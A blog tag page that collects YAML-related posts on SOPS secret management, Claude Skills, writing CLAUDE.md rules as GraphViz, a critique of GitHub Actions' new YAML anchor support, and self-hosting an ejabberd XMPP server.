Posts in Yaml (19 found)
codedge 3 weeks ago

Managing secrets with SOPS in your homelab

Sealed Secrets, Ansible Vault, 1Password or SOPS - there are multiple options for how and where to store your secrets. I went with SOPS and age in my ArgoCD GitOps environment. Managing secrets in your homelab, be it within a Kubernetes cluster or while deploying systems and tooling with Ansible, is a topic that arises with almost 100% certainty. In general you need to decide whether you want secrets to be held and managed externally or internally. One important advantage I see with internally managed solutions is that I do not need an extra service: no extra costs and connections, and no chicken-and-egg problem where your passwords are hosted inside your own Kubernetes cluster but cannot be reached when the cluster is down. Therefore I went with SOPS for both the secrets for my Ansible scripts and the secrets I need to set for my K8s cluster. While SOPS can be used with PGP, GnuPG and more, I settled on age for encryption. With SOPS your secrets live, encrypted, inside your repository and can be en-/decrypted on the fly whenever needed. The private key used for decryption should, of course, never be committed to your git repository or made available to untrusted sources. First, we need to install SOPS and age and generate an age key. SOPS is available for all common operating systems via the package manager; I use either macOS or Arch. Now we need to generate an age key and register it with SOPS as the default key to encrypt with. Generate an age key; it will live in a key file on disk. Then we tell SOPS where to find our age key - I put the corresponding export line in my shell profile. The last thing to do is to put a .sops.yaml in the folder from which you want to encrypt your files. This file acts as a configuration regarding the age recipient (key) and how the data should be encrypted. My config file looks like this: You might wonder about the first rule and its encrypted_regex. I will just quote the KSOPS docs here:
To make encrypted secrets more readable, we suggest using the following encryption regex to only encrypt data and stringData values. This leaves non-sensitive fields, like the secret’s name, unencrypted and human readable. All the configuration options can be found in the SOPS docs. Let’s now look into the specifics of using our new setup with either Ansible or Kubernetes. Ansible can automatically process (decrypt) SOPS-encrypted files with the Community SOPS Collection. Additionally, in my ansible.cfg I enabled this plugin (see docs). Now, taken from the official Ansible docs: after the plugin is enabled, correctly named group and host vars files will be transparently decrypted with SOPS. The files must end with one of these extensions:

- .sops.yaml
- .sops.yml
- .sops.json

That’s it. You can now encrypt your group or host vars files and Ansible can automatically decrypt them. SOPS can be used with Kubernetes via the KSOPS Kustomize plugin. The configuration we already prepared; we only need to apply KSOPS to our cluster. I use the following manifest - see more examples in my homelab repository:

In summary:

- Externally managed: this includes either a self-hosted or externally hosted secrets solution like AWS KMS, a password manager like 1Password, or similar
- Internally managed: solutions where your secrets live next to your code; no external service is needed
- Installation: SOPS and age are available via the usual package managers (Homebrew on macOS, pacman on Arch Linux)
- The .sops.yaml contains two separate rules depending on the folder where the encrypted files are located; files ending with the configured suffix are targeted, and the age key that should be used for en-/decryption is specified
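The elided configuration files might look roughly like the following sketches. The path regexes and the age recipient are placeholders, not the author's actual values; the generator manifest follows the viaduct.ai/v1 format documented by the KSOPS project:

```yaml
# .sops.yaml -- two creation rules, selected by the folder the file lives in.
creation_rules:
  # Kubernetes secrets: encrypt only data/stringData, per the KSOPS advice.
  - path_regex: kubernetes/.*\.sops\.ya?ml$
    encrypted_regex: ^(data|stringData)$
    age: age1examplepublickeyplaceholder   # your age public key (recipient)
  # Ansible group/host vars: encrypt everything.
  - path_regex: ansible/.*\.sops\.ya?ml$
    age: age1examplepublickeyplaceholder
---
# A KSOPS generator manifest referencing an encrypted secret.
apiVersion: viaduct.ai/v1
kind: ksops
metadata:
  name: secret-generator
files:
  - secret.enc.yaml
```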

Kaushik Gopal 1 month ago

Claude Skills: What's the Deal?

Anthropic announced Claude Skills and my first reaction was: “So what?” We already have AGENTS.md files, slash commands, nested instructions, or even MCPs. What’s new here? But if Simon W thinks this is a big deal , then pelicans be damned; I must be missing something. So I dissected every word of Anthropic’s eng. blog post to find what I missed. I don’t think the innovation is what Skills does or achieves, but rather how it does it that’s super interesting. This continues their push on context engineering as the next frontier. Skills are simple markdown files with YAML frontmatter. But what makes them different is the idea of progressive disclosure : Progressive disclosure is the core design principle that makes Agent Skills flexible and scalable. Like a well-organized manual that starts with a table of contents, then specific chapters, and finally a detailed appendix, skills let Claude load information only as needed. So here’s how it works:

- Scan at startup: Claude scans available Skills and reads only their YAML descriptions (name, summary, when to use)
- Build lightweight index: This creates a catalog of capabilities (with minimal token cost); think dozens of tokens per skill
- Load on demand: The full content of a Skill only gets injected into context when Claude’s reasoning determines it’s relevant to the current task

This dynamic context loading mechanism is very token efficient ; that’s the interesting development here. In this token-starved AI economy, that’s 🤑. Other solutions aren’t as good in this specific way:

- Why not throw everything into AGENTS.md? You could add all the info directly and agents would load it at session start. The problem: loading everything fills up your context window fast, and your model starts outputting garbage unless you adopt other strategies. Not scalable. (✓ Auto-discovered and loaded. ✗ Static: all context loaded upfront, bloats the context window at scale.)
- Nested files: Place an AGENTS.md in each subfolder and agents read the nearest file in the tree. This splits context across folders and solves token bloat. But it’s not portable across directories and creates an override behavior instead of true composition. (✓ Scoped to directories. ✗ Not portable across folders; overrides behavior, not composition.)
- Referenced files: Place instructions in separate files and reference them in AGENTS.md. This fixes the portability problem vs the nested approach. But when referenced, the full content still loads statically. Feels closest to Skills, but lacks the JIT loading mechanism. (✓ Organized and modular. ✗ Still requires static loading when referenced.)
- Slash commands: Slash commands (or their Codex equivalent) let you provide organized, hyper-specific instructions to the LLM. You can even script sequences of actions, just like Skills. The problem: these aren’t auto-discovered. You must manually invoke them, which breaks agent autonomy. (✓ Powerful and procedural. ✗ Manual invocation breaks agent autonomy.)
- MCPs: Skills handle 80% of MCP use cases with 10% of the complexity. You don’t need a network protocol if you can drop a markdown file that says “to access the GitHub API, use this tool with these flags.” To be quite honest, I’ve never been a big fan of MCPs. I think they make a lot of sense for inter-service communication, but more often than not they’re overkill. (✓ Access to external data sources. ✗ Heavyweight; vendor lock-in; overkill for procedural knowledge.)

Token-efficient context loading is the innovation. Everything else you can already do with existing tools. If this gets adoption, it could replace slash commands and simplify MCP use cases. I keep forgetting, this is for the Claude product generally (not just Claude Code), which is cool. Skills is starting to solve the larger problem: “How do I give my agent deep expertise without paying the full context cost upfront?” That’s an architectural improvement definitely worth solving, and Skills looks like a good attempt.
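The scan/index/load mechanism described above can be sketched in plain Python. This is a toy illustration of the idea, not Anthropic's implementation; the SKILL.md layout and the pdf-tools skill are invented for the example:

```python
import os
import tempfile

SKILL = """---
name: pdf-tools
description: Fill in and extract text from PDF forms. Use when the user asks about PDFs.
---
# PDF Tools
(Full instructions, examples, and script references live here --
potentially thousands of tokens of detail.)
"""

def frontmatter(path):
    """Step 1 (scan): read only the YAML frontmatter, not the full skill body."""
    meta = {}
    with open(path) as f:
        assert f.readline().strip() == "---"
        for line in f:
            if line.strip() == "---":
                break
            key, _, value = line.partition(":")
            meta[key.strip()] = value.strip()
    return meta

def build_index(skill_dir):
    """Step 2 (index): a lightweight catalog -- dozens of tokens per skill."""
    return {
        frontmatter(os.path.join(skill_dir, name))["name"]: os.path.join(skill_dir, name)
        for name in os.listdir(skill_dir)
        if name.endswith(".md")
    }

def load_on_demand(index, skill_name):
    """Step 3 (load): inject the full body only when the task needs it."""
    with open(index[skill_name]) as f:
        return f.read()

with tempfile.TemporaryDirectory() as d:
    with open(os.path.join(d, "pdf-tools.md"), "w") as f:
        f.write(SKILL)
    index = build_index(d)   # cheap: frontmatter only
    print(sorted(index))     # ['pdf-tools']
    body = load_on_demand(index, "pdf-tools")
```

The point of the sketch is the asymmetry: `build_index` touches only a few lines per file, while the expensive `load_on_demand` read happens for at most the one skill the task actually needs.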

Simon Willison 1 month ago

Claude Skills are awesome, maybe a bigger deal than MCP

Anthropic this morning introduced Claude Skills, a new pattern for making new abilities available to their models: Claude can now use Skills to improve how it performs specific tasks. Skills are folders that include instructions, scripts, and resources that Claude can load when needed. Claude will only access a skill when it's relevant to the task at hand. When used, skills make Claude better at specialized tasks like working with Excel or following your organization's brand guidelines. Their engineering blog has a more detailed explanation. There's also a new anthropic/skills GitHub repo. (I inadvertently preempted their announcement of this feature when I reverse engineered and wrote about it last Friday!) Skills are conceptually extremely simple: a skill is a Markdown file telling the model how to do something, optionally accompanied by extra documents and pre-written scripts that the model can run to help it accomplish the tasks described by the skill. Claude's new document creation abilities, which accompanied their new code interpreter feature in September, turned out to be entirely implemented using skills. Those are now available in Anthropic's repo, covering .docx, .pdf, .pptx, and .xlsx files. There's one extra detail that makes this a feature, not just a bunch of files on disk. At the start of a session Claude's various harnesses can scan all available skill files and read a short explanation for each one from the frontmatter YAML in the Markdown file. This is very token efficient: each skill only takes up a few dozen extra tokens, with the full details only loaded in should the user request a task that the skill can help solve. Here's that metadata for an example slack-gif-creator skill that Anthropic published this morning: Toolkit for creating animated GIFs optimized for Slack, with validators for size constraints and composable animation primitives. 
This skill applies when users request animated GIFs or emoji animations for Slack from descriptions like "make me a GIF for Slack of X doing Y". I just tried this skill out in the Claude mobile web app, against Sonnet 4.5. First I enabled the slack-gif-creator skill in the settings, then I prompted: And Claude made me this GIF. Click to play (it's almost epilepsy inducing, hence the click-to-play mechanism): OK, this particular GIF is terrible, but the great thing about skills is that they're very easy to iterate on to make them better. Here are some noteworthy snippets from the Python script it wrote, comments mine: This is pretty neat. Slack GIFs need to be a maximum of 2MB, so the skill includes a validation function which the model can use to check the file size. If it's too large the model can have another go at making it smaller. The skills mechanism is entirely dependent on the model having access to a filesystem, tools to navigate it and the ability to execute commands in that environment. This is a common pattern for LLM tooling these days - ChatGPT Code Interpreter was the first big example of this back in early 2023, and the pattern later extended to local machines via coding agent tools such as Cursor, Claude Code, Codex CLI and Gemini CLI. This requirement is the biggest difference between skills and previous attempts at expanding the abilities of LLMs, such as MCP and ChatGPT Plugins. It's a significant dependency, but it's somewhat bewildering how much new capability it unlocks. The fact that skills are so powerful and simple to create is yet another argument in favor of making safe coding environments available to LLMs. The word safe there is doing a lot of work though! We really need to figure out how best to sandbox these environments such that attacks such as prompt injections are limited to an acceptable amount of damage. 
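The size-validation idea described above (check the generated GIF against Slack's 2MB cap so the model can retry with fewer frames or smaller dimensions) can be sketched like this; the function name and return shape are my invention, not the skill's actual code:

```python
import os
import tempfile

SLACK_MAX_GIF_BYTES = 2 * 1024 * 1024  # Slack's 2MB limit, per the skill

def validate_gif_size(path):
    """Return (ok, size) so the caller can decide whether to regenerate
    the GIF with fewer frames or smaller dimensions."""
    size = os.path.getsize(path)
    return size <= SLACK_MAX_GIF_BYTES, size

# Example: a fake 3MB file fails validation, prompting another attempt.
fd, path = tempfile.mkstemp(suffix=".gif")
with os.fdopen(fd, "wb") as f:
    f.write(b"\x00" * (3 * 1024 * 1024))
ok, size = validate_gif_size(path)
os.remove(path)
print(ok, size)  # False 3145728
```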
Back in January I made some foolhardy predictions about AI/LLMs, including that "agents" would once again fail to happen: I think we are going to see a lot more froth about agents in 2025, but I expect the results will be a great disappointment to most of the people who are excited about this term. I expect a lot of money will be lost chasing after several different poorly defined dreams that share that name. I was entirely wrong about that. 2025 really has been the year of "agents", no matter which of the many conflicting definitions you decide to use (I eventually settled on "tools in a loop"). Claude Code is, with hindsight, poorly named. It's not purely a coding tool: it's a tool for general computer automation. Anything you can achieve by typing commands into a computer is something that can now be automated by Claude Code. It's best described as a general agent. Skills make this a whole lot more obvious and explicit. I find the potential applications of this trick somewhat dizzying. Just thinking about this with my data journalism hat on: imagine a folder full of skills that covers tasks like the following:

- Where to get US census data from and how to understand its structure
- How to load data from different formats into SQLite or DuckDB using appropriate Python libraries
- How to publish data online, as Parquet files in S3 or pushed as tables to Datasette Cloud
- A skill defined by an experienced data reporter talking about how best to find the interesting stories in a new set of data
- A skill that describes how to build clean, readable data visualizations using D3

Congratulations, you just built a "data journalism agent" that can discover and help publish stories against fresh drops of US census data. And you did it with a folder full of Markdown files and maybe a couple of example Python scripts. Model Context Protocol has attracted an enormous amount of buzz since its initial release back in November last year. I like to joke that one of the reasons it took off is that every company knew they needed an "AI strategy", and building (or announcing) an MCP implementation was an easy way to tick that box. Over time the limitations of MCP have started to emerge. The most significant is in terms of token usage: GitHub's official MCP on its own famously consumes tens of thousands of tokens of context, and once you've added a few more to that there's precious little space left for the LLM to actually do useful work. My own interest in MCPs has waned ever since I started taking coding agents seriously. Almost everything I might achieve with an MCP can be handled by a CLI tool instead. LLMs know how to call --help, which means you don't have to spend many tokens describing how to use them - the model can figure it out later when it needs to. Skills have exactly the same advantage, only now I don't even need to implement a new CLI tool. I can drop in a Markdown file describing how to do a task instead, adding extra scripts only if they'll help make things more reliable or efficient. One of the most exciting things about Skills is how easy they are to share. I expect many skills will be implemented as a single file - more sophisticated ones will be a folder with a few more. Anthropic have Agent Skills documentation and a Claude Skills Cookbook. I'm already thinking through ideas of skills I might build myself, like one on how to build Datasette plugins. Something else I love about the design of skills is there is nothing at all preventing them from being used with other models. You can grab a skills folder right now, point Codex CLI or Gemini CLI at it and say "read pdf/SKILL.md and then create me a PDF describing this project" and it will work, despite those tools and models having no baked in knowledge of the skills system. I expect we'll see a Cambrian explosion in Skills which will make this year's MCP rush look pedestrian by comparison.


Using GraphViz for CLAUDE.md

This is a very, very informal interim research report about something I've been playing with over the past couple days. Last Friday, I saw an absolutely astonishing extemporaneous talk by an organization that is so far down the curve of AI maximalist development that it kind of broke my brain. I'm hoping to write more about a bunch of what I saw in the coming weeks, but I'm very much still digesting what I saw. One of the things that I thought they said during the talk was that they were using .dot (GraphViz) as the language that they are using as the formalization for new processes for their coding agent. It made sense to me. There's enough dot on the Internet that models can read and understand it quite well. And it removes a whole bunch of the ambiguity of English language specifications. It turns out that I completely misunderstood what was going on, in the best possible way. They're using GraphViz, but not for that. They're using Markdown files to allow the agent to document new processes and capabilities for itself. That makes tons of sense. It's roughly the same format that Anthropic is using for Claude's new 'SKILL.md' files, which are just Markdown files with YAML frontmatter. But before I was corrected, I went home and started experimenting. And... I'm kind of excited about what I ended up with. The first thing I did was that I asked Claude to convert my CLAUDE.md into GraphViz. It worked pretty well because most of my CLAUDE.md was process documentation. The first iterations (which didn't get saved) were somewhat unhinged. My processes were inconsistent and doing this work made the problems very, very obvious. Over the course of a couple hours, Claude and I iterated on my processes and on how to use dot as specification language. 
There was only one absolute disaster of a hallucination when I asked Claude to update the process with what would be "100x better" and it threw in a whole bunch of Science Fiction features...that will still probably be Science Fiction 6 months from now. After about a dozen rounds of iteration, we workshopped my processes to the point where they mostly seemed to flow correctly AND the .dot document was really readable by both of us. And then I swapped it in place of my CLAUDE.md and fired up a session and...Claude behaved normally and understood my rules. I ran a couple of vibechecks, asking it for the same small project with both the traditional rules and the .dot rules. It was a very unscientific test, but I found the .dot version of Claude and its output preferable. At least in these early tests, Claude seems better at understanding and following rules written as dot. And the format makes it much easier to visualize many situations when you're giving your robot buddy rules it can't follow. We also put together a .dot styleguide to eventually let Claude more easily write its own processes. I haven't yet had a ton of experience with CLAUDE self-documenting new processes, but that's coming. (As an aside, I also have another mini-project running that's extracting learnings and memories from all my previous Claude Code sessions. But that's a story for another day. Until then, you can find it on GitHub at https://github.com/obra/claude-memory-extractor) This was my most recent CLAUDE.md before this project: This is my current CLAUDE dot md: What follows is a mini-writeup written by Claude (Opus 4.1). I made the mistake of asking it to write in my voice, but make no mistake - all the words after this point are generated. They don't tell a good story about my motivations, but the narrative does a decent job explaining the investigation process. I've been working with Claude for a while now, and I have a detailed CLAUDE.md file that contains all my rules and preferences. 
It's great, but it's also... a wall of text. Rules like "NEVER use git add -A" and a prohibition on "You're absolutely right!" are scattered throughout. When Claude needs to follow a complex process, it's not always clear what the actual flow should be. So I had an idea: what if we could use Graphviz's dot language as a DSL for documenting processes? Not for pretty diagrams (though that's a nice side effect), but as a structured, searchable, executable process definition language that Claude can actually read and follow. First attempt - just document everything that's already in CLAUDE.md as a massive flowchart: This was... overwhelming. Too many boxes, too many connections, and honestly, Claude would never be able to follow this. It looked comprehensive but wasn't actually useful. I realized Rule #1 ("Break any rule? Stop and ask Jesse") shouldn't be a separate entry point but should be embedded throughout: Better, but still treating processes as these separate phases that don't really reflect how work actually happens. Tried to create a more unified workflow: This was starting to look more realistic, but still too academic. The "continuous processes" box was a particular cop-out - those aren't separate activities, they happen during the work. Tried to boil it down to the essence: Cleaner, but now we'd lost important detail. Also those emoji warnings didn't render properly - turns out Graphviz doesn't love Unicode. Got ambitious and created two versions - one documenting current processes, one imagining what would make Claude "superhuman": This was incredibly detailed - 7 layers of process! But when I asked myself "could Claude actually follow this?" the answer was no. Too complex. This was fantasy. Things like "confidence percentages" and "cognitive load monitoring" - Claude can't actually do these. I was designing capabilities that don't exist. Converted the "superhuman" version into things Claude could actually do: Better! 
Actionable steps like "Write down what's not working" instead of "Monitor cognitive load." But the task classification at the start was artificial - Claude doesn't actually know if something will take 30 minutes. Time to get real about what actually happens: This version admitted the truth: Claude often jumps into coding too quickly, forgets to search for similar code, and has specific danger zones where it fails. Much more useful! Tried organizing as a proper framework: But then I realized - these aren't really "phases." Work doesn't happen in phases, it's all interconnected with loops and branches. Getting closer to reality: This showed the actual flow better, but was still hard for Claude to parse from the dot file itself. Then came the key insight: Claude doesn't need one giant flowchart. It needs to be able to jump to the right process based on the current situation. Enter trigger-based design: Now each cluster is a self-contained process that starts with a clear trigger. Claude can search for "stuck" and find the "When Stuck" process. Much better! Then I learned you can use quoted strings as node identifiers in dot: Instead of: This transformed everything! The final readable version: Now the dot file itself is readable documentation. Claude can parse it directly without mental translation. Removed all labels and used semantic naming: With good naming, the labels are completely redundant. The diagram is cleaner and the source is more maintainable. We even created processes for maintaining the processes: The key insight: processes come from experience, not planning. Either Jesse teaches me something, I discover a pattern through repetition, or I hit a gap in existing processes. To make this systematic, we created a style guide - also written in dot! 
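The quoted-identifier trick reads roughly like this (invented node names for illustration, not the actual process file):

```dot
// Before: opaque identifiers plus labels.
digraph before {
    n1 [label="Tests failing?", shape=diamond];
    n2 [label="Read the failure message"];
    n1 -> n2;
}

// After: quoted strings as identifiers -- the source itself is readable.
digraph after {
    "Tests failing?" [shape=diamond];
    "Tests failing?" -> "Read the failure message";
}
```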
The style guide defines:

- Different node shapes for different purposes (diamonds for decisions, octagons for warnings, etc.)
- Naming conventions for clarity
- When to add new processes
- How to test if a process is useful

Applying all these lessons, this version:

- Uses semantic node shapes (plaintext for commands, diamonds for decisions, octagons for warnings)
- Has clear trigger points for each process
- Is readable both as a diagram and as source code
- Actually represents how Claude works, not how we wish it worked

Using Graphviz dot notation as a process DSL is actually brilliant because:

- It's visual when you need it to be
- It's searchable text when Claude needs to find something
- It enforces structure (nodes and edges)
- It's version controllable
- It renders nicely for documentation

Instead of one massive flowchart, having separate processes with clear triggers is much more useful:

- "When stuck" -> go to stuck process
- "Test failing" -> go to debug process
- "New request" -> go to request process

Using quoted strings and meaningful names makes the dot files themselves readable - so much clearer than opaque identifiers. Using different shapes systematically helps Claude understand what type of thing each node is:

- diamonds for decisions
- plaintext for literal commands to run
- octagons for critical warnings

The most useful version wasn't the most comprehensive one. It was the one that:

- Admitted where Claude actually fails
- Included only processes that actually get used
- Used simple, clear language
- Could be followed mechanically

Instead of one giant file, we could have a process library in a dedicated directory. Each file would be a focused, trigger-based process that Claude could load when needed. We could even hook this into the slash command system - imagine loading and displaying the relevant process. What started as an attempt to visualize CLAUDE.md turned into discovering that Graphviz's dot language is actually a fantastic DSL for defining executable processes. The key wasn't making prettier diagrams - it was realizing that the text representation itself could be the documentation. The final version is something Claude can actually read, understand, and follow. It's not perfect, but it's honest about how Claude actually works and where it tends to fail. And that honesty makes it genuinely useful. Most importantly, this isn't just documentation - it's a living process definition that can evolve as we discover new patterns and better ways of working. Every time Jesse teaches me something new or I discover a pattern that works, it can become a new process in the library. The real magic is that we're using a graph description language for what it was meant for - describing flows and relationships - but in a way that's both human-readable and machine-parseable. That's the sweet spot for AI assistance tools.
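A sketch of the semantic-shape convention the style guide describes (hypothetical nodes, not taken from the real style guide):

```dot
digraph shapes {
    "Is there a failing test?" [shape=diamond];   // decision
    "git stash"                [shape=plaintext]; // literal command to run
    "NEVER use git add -A"     [shape=octagon];   // critical warning

    "Is there a failing test?" -> "git stash";
}
```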

ENOSUCHBLOG 2 months ago

Dear GitHub: no YAML anchors, please

TL;DR: for a very long time, GitHub Actions lacked support for YAML anchors. This was a good thing. YAML anchors in GitHub Actions are (1) redundant with existing functionality, (2) a complication to the data model that makes CI/CD harder for humans and machines to comprehend, and (3) not even uniquely useful, because GitHub has chosen not to support the one feature (merge keys) that lacks a semantic equivalent in GitHub Actions. For these reasons, YAML anchors are a step backwards that reinforces GitHub Actions’ status as an insecure-by-default CI/CD platform. GitHub should immediately remove support for YAML anchors, before adoption becomes widespread. GitHub recently announced that YAML anchors are now supported in GitHub Actions. That means that users can write things like this: On face value, this seems like a reasonable feature: the job and step abstractions in GitHub Actions lend themselves to duplication, and YAML anchors are one way to reduce that duplication. Unfortunately, YAML anchors are a terrible tool for this job. Furthermore (as we’ll see) GitHub’s implementation of YAML anchors is incomplete, precluding the actual small subset of use cases where YAML anchors are uniquely useful (but still not a good idea). We’ll see why below. Pictured: the author’s understanding of the GitHub Actions product roadmap. The simplest reason why YAML anchors are a bad idea is that they’re redundant with other, more explicit mechanisms for reducing duplication in GitHub Actions. GitHub’s own example above could be rewritten without YAML anchors as: This version is significantly clearer, but has slightly different semantics: all jobs inherit the workflow-level env. But this, in my opinion, is a good thing: the need to template environment variables across a subset of jobs suggests an architectural error in the workflow design. 
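Since neither snippet survives here, the following is a representative sketch of the pattern and its anchor-free rewrite (job names and env values are invented, not GitHub's actual example):

```yaml
# With an anchor: define shared env once, alias it into each job.
jobs:
  build:
    runs-on: ubuntu-latest
    env: &shared-env
      CI: "true"
      CACHE_DIR: .cache
    steps:
      - run: make build
  test:
    runs-on: ubuntu-latest
    env: *shared-env
    steps:
      - run: make test
---
# Without anchors: hoist the mapping to the workflow level instead.
# (Slightly different semantics: every job now inherits it.)
env:
  CI: "true"
  CACHE_DIR: .cache
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: make build
  test:
    runs-on: ubuntu-latest
    steps:
      - run: make test
```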
In other words: if you find yourself wanting to use YAML anchors to share “global” configuration between jobs or steps, you probably actually want separate workflows, or at least separate jobs with job-level env blocks. In summary: YAML anchors further muddy the abstractions of workflows, jobs, and steps by introducing a cross-cutting form of global state that doesn’t play by the rules of the rest of the system. This, to me, suggests that the current Actions team lacks a strong set of opinions about how GitHub Actions should be used, leading to a “kitchen sink” approach that serves all users equally poorly. As noted above: YAML anchors introduce a new form of non-locality into GitHub Actions. Furthermore, this form of non-locality is fully general: any YAML node can be anchored and referenced. This is a bad idea for humans and machines alike: For humans: a new form of non-locality makes it harder to preserve local understanding of what a workflow, job, or step does: a unit of work may now depend on any other unit of work in the same file, including one hundreds or thousands of lines away. This makes it harder to reason about the behavior of one’s GitHub Actions without context switching. It would only be fair to note that GitHub Actions already has some forms of non-locality: global contexts, scoping rules for blocks, dependencies, step and job outputs, and so on. These can be difficult to debug! But what sets them apart is their lack of generality: each has precise semantics and scoping rules, meaning that a user who understands those rules can comprehend what a unit of work does without referencing the source of an environment variable, output, &c. For machines: non-locality makes it significantly harder to write tools that analyze (or transform) GitHub Actions workflows. The pain here boils down to the fact that YAML anchors diverge from the one-to-one object model [1] that GitHub Actions otherwise maps onto. 
With anchors, that mapping becomes one-to-many: the same element may appear once in the source, but multiple times in the loaded object representation. In effect, this breaks a critical assumption that many tools make about YAML in GitHub Actions: that an entity in the deserialized object can be mapped back to a single concrete location in the source YAML. This is needed to present reasonable source locations in error messages, but it doesn’t hold if the object model doesn’t represent anchors and references explicitly. Furthermore, this is the reality for every YAML parser in wide use: all widespread YAML parsers choose (reasonably) to copy anchored values into each location where they’re referenced, meaning that an analyzing tool cannot “see” the original element for source-location purposes. I feel these pains directly: I maintain zizmor as a static analysis tool for GitHub Actions, and it makes both of these assumptions. Moreover, its dependencies make these assumptions: its YAML parser (like most other YAML parsers) chooses to deserialize YAML anchors by copying the anchored value into each location where it’s referenced [2]. One of the few things that makes YAML anchors uniquely useful is merge keys: a merge key allows a user to compose multiple referenced mappings together into a single mapping. An example from the YAML spec, which I think tidily demonstrates both their use case and how incredibly confusing merge keys are: I personally find this syntax incredibly hard to read, but at least it has a unique use case that could be useful in GitHub Actions: composing multiple sets of environment variables together with clear precedence rules is manifestly useful. Except: GitHub Actions doesn’t support merge keys! They appear to be using their own internal YAML parser that already had some degree of support for anchors and references, but not for merge keys. 
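The merge-key pattern under discussion looks roughly like this (an adapted sketch in the spirit of the spec's example, not the verbatim text):

```yaml
# Merge keys (<<) compose referenced mappings; explicit keys win over merged ones.
defaults: &defaults
  adapter: postgres
  host: localhost

development:
  <<: *defaults
  database: dev_db   # adds to the merged defaults

test:
  <<: *defaults
  host: db.test      # overrides the anchored host value
```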
To me, this takes the situation from a set of bad technical decisions (and lack of strong opinions around how GitHub Actions should be used) to farce: the one thing that makes YAML anchors uniquely useful in the context of GitHub Actions is the one thing that GitHub Actions doesn’t support. To summarize, I think YAML anchors in GitHub Actions are (1) redundant with existing functionality, (2) a complication to the data model that makes human and machine comprehension of CI/CD harder, and (3) not even uniquely useful, because GitHub has chosen not to support the one feature (merge keys) that lacks a semantic equivalent in GitHub Actions. Of these reasons, I think (2) is the most important: GitHub Actions security has been in the news a great deal recently, with the overwhelming consensus being that it’s too easy to introduce vulnerabilities in (or expose otherwise latent vulnerabilities through) GitHub Actions workflows. For this reason, we need GitHub Actions to be easy to analyze for humans and machines alike. In effect, this means that GitHub should be decreasing the complexity of GitHub Actions, not increasing it. YAML anchors are a step in the wrong direction for all of the aforementioned reasons. Of course, I’m not without self-interest here: I maintain a static analysis tool for GitHub Actions, and supporting YAML anchors is going to be an absolute royal pain in my ass 3 . But it’s not just me: tools like actionlint , claws , and poutine are all likely to struggle with supporting YAML anchors, as they fundamentally alter each tool’s relationship to GitHub Actions’ assumed data model. As-is, this change blows a massive hole in the larger open source ecosystem’s ability to analyze GitHub Actions for correctness and security. All told: I strongly believe that GitHub should immediately remove support for YAML anchors in GitHub Actions.
The “good” news is that they can probably do so with a bare minimum of user disruption, since support has only been public for a few days and adoption is (probably) still primarily at the single-use workflow layer and not the reusable action (or workflow) layer. That object model is essentially the JSON object model, where all elements appear as literal components of their source representation and take a small subset of possible types (string, number, boolean, array, object, null).  ↩ In other words: even though YAML itself is a superset of JSON, users don’t want YAML-isms to leak through to the object model. Everybody wants the JSON object model, and that means no “anchor” or “reference” elements anywhere in a deserialized structure.  ↩ To the point where I’m not clear it’s actually worth supporting anchors to any meaningful extent, and instead immediately flagging them as an attempt at obfuscation.  ↩

codedge 2 months ago

Modern messaging: Running your own XMPP server

For years we have known, or might suspect, that our chats are listened in on, our uploaded files are sold for advertising or whatever other purpose, and the chance that our social messengers leak our private data is incredibly high. It is about time to work against this. For three years the European Commission has been working on a plan to automatically monitor all chat, email and messenger conversations. 1 2 If this passes, and I strongly hope it will not, the European Union is moving in a direction we know from states that suppress freedom of speech. I went with setting up my own XMPP server, as it does not have any big resource requirements and still supports clustering (for high-availability purposes), encryption via OMEMO, and file sharing, and is available for many platforms and operating systems. The ecosystem of clients has also evolved over the years to provide rock-solid software and solutions for multi-user chats or even audio and video calls. All steps and settings are bundled in a repository containing Ansible roles: https://codeberg.org/codedge/chat All code snippets below work on either Debian or Raspberry Pi OS. The connection from your client to the XMPP server is encrypted, so we need certificates for our server. The first thing to do is set up our domains and point them to the server's IP - both IPv4 and IPv6 are supported and we can specify both later in our configuration. I assume the server is going to be run under your chosen domain and that all the following domains have been set up. Fill in the IPv6 addresses accordingly. ejabberd is robust server software that is included in most Linux distributions. Install from Process One repository I discovered that ProcessOne, the company behind ejabberd , also provides a Debian repository . Install from GitHub To get the most recent version, I use the packages offered in their code repository .
To install version 25.07, just download the asset from the release: Make sure the following ports are opened in your firewall, taken from the ejabberd firewall settings . Port , used for MQTT, is also mentioned in the ejabberd docs, but we do not use it in our setup, so this port stays closed. Depending on how you installed ejabberd, the config file is either at or . The configuration is a 70:30 balance between having a privacy-focused setup for your users and meeting most of the suggestions of the XMPP compliance test . That means settings that protect the privacy of the users are rated higher, despite not passing the test. Notable privacy and security settings therefore are: The configuration file is in YAML format. Keep an eye on indentation. Let’s start digging into the configuration. Set the domain of your server Set the database type Instead of using the default type, we opt for , or better said . Generate DH params Generate a fresh set of parameters for the DH key exchange. In your terminal run and link the new file in the ejabberd configuration. Ensure TLS for server-to-server connections Use TLS for server-to-server (s2s) connections. The listeners The listeners, aka inside the config, especially those for , , and , are important. All of them listen on port . Only one request handler is attached to port , the . For administration of ejabberd we need a user with admin rights and properly set up ACLs and access rules. There is a separate section for ACLs inside the config in which we set up an admin user named . The name of the user is important for later, when we actually create this user. The should already be set up; just confirm that you have a correct entry for the action. Now the new user needs to be created by running this command on the console. Watch out to put in the correct domain. Another user can be registered with the same command. We previously set as the admin user in the config. That is how ejabberd knows which user has admin permissions.
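Pulling the pieces above together, the relevant fragments of an ejabberd.yml might look roughly like this (a sketch — the domain and admin user name are assumptions, substitute your own):

```yaml
# Sketch only: domain, user name and paths are placeholders.
hosts:
  - chat.example.org

# Require TLS for server-to-server connections.
s2s_use_starttls: required

# Admin user and the access rule that grants them configuration rights.
acl:
  admin:
    user:
      - admin@chat.example.org

access_rules:
  configure:
    allow: admin
```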
